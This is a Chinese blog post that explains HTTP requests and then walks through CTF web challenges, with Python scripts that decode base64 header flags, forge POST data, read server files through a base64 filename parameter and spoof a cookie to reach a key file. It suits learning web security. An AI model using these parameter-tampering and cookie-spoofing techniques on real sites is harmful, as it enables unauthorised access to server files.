web安全 模擬Http請(qǐng)求

其實(shí)一直想出一篇文章詳解Http請(qǐng)求的,但是本人現(xiàn)在沒(méi)有把握寫(xiě)的通俗易懂,但Http請(qǐng)求對(duì)于web至為重要,所以請(qǐng)萌新們不要浮躁,耐心看完Woo__dalao寫(xiě)的Http請(qǐng)求。
鄭重聲明:以下圖片和文字來(lái)自一篇文章帶你詳解 HTTP 協(xié)議一文

Http協(xié)議概述
HTTP協(xié)議(HyperText Transfer Protocol,超文本傳輸協(xié)議)是用于從WWW服務(wù)器傳輸超文本到本地瀏覽器的傳輸協(xié)議。它可以使瀏覽器更加高效,使網(wǎng)絡(luò)傳輸減少。它不僅保證計(jì)算機(jī)正確快速地傳輸超文本文檔,還確定傳輸文檔中的哪一部分,以及哪部分內(nèi)容首先顯示(如文本先于圖形)等。

HTTP 工作過(guò)程

response.jpg
  • 建立 TCP 連接
    在HTTP工作開(kāi)始之前,客戶(hù)端首先要通過(guò)網(wǎng)絡(luò)與服務(wù)器建立連接,該連接是通過(guò) TCP 來(lái)完成的,該協(xié)議與 IP 協(xié)議共同構(gòu)建 Internet,即著名的 TCP/IP 協(xié)議族,因此 Internet 又被稱(chēng)作是 TCP/IP 網(wǎng)絡(luò)。HTTP 是比 TCP 更高層次的應(yīng)用層協(xié)議,根據(jù)規(guī)則,只有低層協(xié)議建立之后,才能進(jìn)行高層協(xié)議的連接,因此,首先要建立 TCP 連接,一般 TCP 連接的端口號(hào)是80;
  • 客戶(hù)端向服務(wù)器發(fā)送請(qǐng)求命令
    一旦建立了TCP連接,客戶(hù)端就會(huì)向服務(wù)器發(fā)送請(qǐng)求命令;
    例如:GET/sample/hello.jsp HTTP/1.1
  • 客戶(hù)端發(fā)送請(qǐng)求頭信息
    客戶(hù)端發(fā)送其請(qǐng)求命令之后,還要以頭信息的形式向服務(wù)器發(fā)送一些別的信息,之后客戶(hù)端發(fā)送了一空白行來(lái)通知服務(wù)器,它已經(jīng)結(jié)束了該頭信息的發(fā)送;
  • 服務(wù)器應(yīng)答
    客戶(hù)端向服務(wù)器發(fā)出請(qǐng)求后,服務(wù)器會(huì)客戶(hù)端返回響應(yīng);
    例如: HTTP/1.1 200 OK
    響應(yīng)的第一部分是協(xié)議的版本號(hào)和響應(yīng)狀態(tài)碼
  • 服務(wù)器返回響應(yīng)頭信息
    正如客戶(hù)端會(huì)隨同請(qǐng)求發(fā)送關(guān)于自身的信息一樣,服務(wù)器也會(huì)隨同響應(yīng)向用戶(hù)發(fā)送關(guān)于它自己的數(shù)據(jù)及被請(qǐng)求的文檔;
  • 服務(wù)器向客戶(hù)端發(fā)送數(shù)據(jù)
    服務(wù)器向客戶(hù)端發(fā)送頭信息后,它會(huì)發(fā)送一個(gè)空白行來(lái)表示頭信息的發(fā)送到此為結(jié)束,接著,它就以 Content-Type 響應(yīng)頭信息所描述的格式發(fā)送用戶(hù)所請(qǐng)求的實(shí)際數(shù)據(jù);
  • 服務(wù)器關(guān)閉 TCP 連接
    一般情況下,一旦服務(wù)器向客戶(hù)端返回了請(qǐng)求數(shù)據(jù),它就要關(guān)閉 TCP 連接,然后如果客戶(hù)端或者服務(wù)器在其頭信息加入了這行代碼 Connection:keep-alive ,TCP 連接在發(fā)送后將仍然保持打開(kāi)狀態(tài),于是,客戶(hù)端可以繼續(xù)通過(guò)相同的連接發(fā)送請(qǐng)求。保持連接節(jié)省了為每個(gè)請(qǐng)求建立新連接所需的時(shí)間,還節(jié)約了網(wǎng)絡(luò)帶寬。

對(duì)于Http報(bào)文客戶(hù)端向服務(wù)器發(fā)送請(qǐng)求命令部分,讓我們用一個(gè)簡(jiǎn)單的例子解析HTTP 協(xié)議報(bào)文結(jié)構(gòu)

ps:這里推薦chorme瀏覽器的postman插件用來(lái)模擬http請(qǐng)求哦~

請(qǐng)求報(bào)文 POST /form/entry HTTP/1.1

request.png

響應(yīng)報(bào)文 HTTP/1.1 200 OK

response.png

應(yīng)用場(chǎng)景:在alert框中尋找flag
postman設(shè)置為Get請(qǐng)求,截獲報(bào)文請(qǐng)求主體

NoEncode.jpg

咋一看最后一行長(zhǎng)得像flag,我們抽一行看看轉(zhuǎn)換編碼試試,
咦~flag竟然躺在這里

選擇unicode轉(zhuǎn)ASCALL

flag.jpg

應(yīng)用場(chǎng)景 偽造post請(qǐng)求

Test1:在x-www-form-urlencoded中填入
查找到的margin值
Result1:回顯更新,有戲

return.jpg

查看分配給瀏覽器的headers,flag躺在這里

result.jpg

Test2:提交題目發(fā)現(xiàn)不正確,多次post報(bào)文段發(fā)現(xiàn)
flag -> 6LeR55qE6L+Y5LiN6ZSZ77yM57uZ5L2gZmxhZ+WQpzog固定不變,但隨后的字符串是隨機(jī)生成的.應(yīng)該是base64格式加密過(guò)了flag
Result2:

base64.jpg

Test3:根據(jù)上述還是不行,根源在于字符串是隨機(jī)生成的,所以flag也是隨機(jī)的,基于python2.7模擬Http請(qǐng)求
post.py

import requests
import base64

url = 'http://120.24.86.145:8002/web6/'
req = requests.session()
res = req.get(url)
flag = res.headers['flag']

txt = base64.b64decode(flag)
txt = txt[txt.index(":"):]
#找到:的前一個(gè)位置,從之后索引間隔一個(gè)位置向后掃描
txt = base64.b64decode(txt)

data = {'margin': txt}
ans = req.post(url,data)
print(ans.content)

Result3:拿到flag

finalkey.jpg

應(yīng)用場(chǎng)景 Cookies欺騙

Test1:通過(guò)postman解析請(qǐng)求報(bào)文,使用base64解密,filename=keys.txt
觀察到URL下存在index.php,修改filename=index.php,未回顯。修改line字段同上

Result1

filename.jpg

Test2:基于python2.7,限定line參數(shù)范圍為40個(gè),獲取index.php

import requests
import base64

url1 = 'http://120.24.86.145:8002/web11/index.php?line='
url2 = '&filename='

filename = base64.b64encode("index.php")
req = requests.session()
for line in range(0, 40):
    url = url1 + str(line) + url2 + filename
    print req.get(url).content

Result2 index.php要求filename=keys.php,且要驗(yàn)證cookies中的margin參數(shù)值為margin

D:\python27\python.exe F:/pythonProject/TestRun/Test.py 
<?php

  error_reporting(0);

  $file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");

  $line=isset($_GET['line'])?intval($_GET['line']):0;

  if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");

  $file_list = array(  '0' =>'keys.txt', '1' =>'index.php', );

  if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
  $file_list[2]='keys.php';

  }


  if(in_array($file, $file_list)){

  $fa = file($file);

  echo $fa[$line];

  }

?>

Test3:驗(yàn)證Cookies中的margin以及filename參數(shù)

import requests
import base64

url1 = 'http://120.24.86.145:8002/web11/index.php?line='
url2 = '&filename='

filename = base64.b64encode("index.php")
req = requests.session()
# for line in range(0, 40):
#     url = url1 + str(line) + url2 + filename
#     print req.get(url).content

filename = base64.b64encode("keys.php")
url = url1 + str(0) + url2 + filename
print req.get(url, cookies={'margin': 'margin'}).content

Result3:返回含有flag的php腳本

D:\python27\python.exe F:/pythonProject/TestRun/Test.py
<?php $key='KEY{key_keys}'; ?>

Process finished with exit code 0
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容